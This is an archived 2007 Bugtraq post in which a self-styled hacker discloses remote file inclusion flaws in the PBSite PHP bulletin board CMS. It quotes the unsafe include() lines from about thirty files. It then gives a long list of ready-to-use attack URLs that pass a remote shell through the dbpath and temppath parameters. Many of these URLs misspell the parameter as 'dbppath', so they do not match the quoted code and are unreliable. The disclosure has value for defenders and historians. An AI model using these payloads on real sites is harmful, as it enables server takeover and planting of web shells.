| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 02 Jun 2007 14:17:12 +0300
From: "pito pito" <the-modest-pirate@...mail.com>
To: bugtraq@...urityfocus.com
Cc: secalert@...urityreason.com
Subject: PBSite - PHP Bulletin Site | CMS ====> RFI
_ _ _ _
.-" "-.
/ \
| TiTaNiC |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_______________________________
(_)@8@8{}<________|-\IIIIII/-|________________________________>
)_/ \ HaCkEr /
(@
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
script:PBSite - PHP Bulletin Site | CMS ====> RFI
url:http://sourceforge.net/project/showfiles.php?group_id=88114
authot:titanichacker (the-modest-pirate@...mail.com)
contact: hack-teach.com & mohandko.com & tryag.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
bug in: %%%
%%%%%%%%%%%
./useronline.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%
./ucp.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%
./setcookie.php
include($temppath."/pb/language/lang_".$language.".php");
include($dbpath.'/settings.php');
%%%%%%%%%%
./sendpm.php
include($dbpath."/settings.php");
%%%%%%%%%%%
./search.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%
./register.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./profile.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./post.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./pmpshow.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./pm.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%
./ntopic.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%
./nreply.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%
./news.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%
./memberslist.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%
./logout.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%%%%
./login.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.php");
include_once("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%%%%%%%%%%%%%
./index.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.php");
include_once("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%%%%%
./help.php
include($dbpath."/settings.php");
include_once($dbpath."/settings/styles/styles.php");
include("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%
./forum.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./error.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%
./editpost.php
include($dbpath."/settings.php");
%%%%%%%%%%%%
./delpost.php
include($dbpath."/settings.php");
%%%%%%%%%%
./delpm.php
include($dbpath."/settings.php");
include("$temppath/pb/language/lang_$language.php");
%%%%%%%%%%%%
./confirm.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%
./board.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%%%%
./admin2.php
include($dbpath."/settings.php");
%%%%%%%%%%%%%%%%%%
./admin.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%
./templates/pb/css/formstyles.php
include ($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
exploit:%%
%%%%%%%%%
http://victim/path/useronline.php?dbpath=[shell]
http://victim/path/useronline.php?temppath=[shell]
%%%%%
http://victim/path/ucp.php?dbpath=[shell]
%%%%%
http://victim/path/setcookie.php?temppath=[shell]
http://victim/path/setcookie.php?dbppath=[shell]
%%%%%
http://victim/path/sendpm.php?dbppath=[shell]
%%%%%%%
http://victim/path/search.php?dbppath=[shell]
http://victim/path/search.php?temppath=[shell]
%%%%%%%%%
http://victim/path/register.php?dbppath=[shell]
http://victim/path/register.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/profile.php?dbpath=[shell]
%%%%%%%%
http://victim/path/post.php?dbppath=[shell]
http://victim/path/post.php?temppath=[shell]
%%%%%%%%%
http://victim/path/pmpshow.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/pm.php?dbppath=[shell]
%%%%%%%%%%%%
http://victim/path/ntopic.php?dbppath=[shell]
%%%%%%%%
http://victim/path/nreply.php?dbppath=[shell]
http://victim/path/nreply.php?temppath=[shell]
%%%%%%%%%%%%
http://victim/path/news.php?dbppath=[shell]
http://victim/path/news.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/memberslist.php?dbppath=[shell]
%%%%%%%%%%%%%%
http://victim/path/logout.php?dbppath=[shell]
http://victim/path/logout.php?temppath=[shell]
%%%%%%%%%%%%%%%%%%
http://victim/path/login.php?dbppath=[shell]
http://victim/path/login.php?temppath=[shell]
%%%%%%%%%%%%%%%%%
http://victim/path/index.php?dbppath=[shell]
http://victim/path/index.php?temppath=[shell]
%%%%%%%%%%%%%
http://victim/path/help.php?dbppath=[shell]
http://victim/path/help.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/forum.php?dbppath=[shell]
http://victim/path/forum.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/error.php?dbppath=[shell]
http://victim/path/error.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/editpost.php?dbppath=[shell]
%%%%%%%%%%
http://victim/path/delpost.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/delpm.php?dbppath=[shell]
http://victim/path/delpm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/confirm.php?dbppath=[shell]
http://victim/path/confirm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/board.php?dbppath=[shell]
http://victim/path/board.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/admin2.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/admin.php?dbppath=[shell]
%%%%%%%%%%%%
http://victim/path/templates/pb/css/formstyles.php?dbpath=[shell]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%
thanx
%%%%%%%%%
cold-zero & mohandko & tryag & arb-hawk & drbaka & kof2002 &
milw0rm & xp10
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Powered by blists - more mailing lists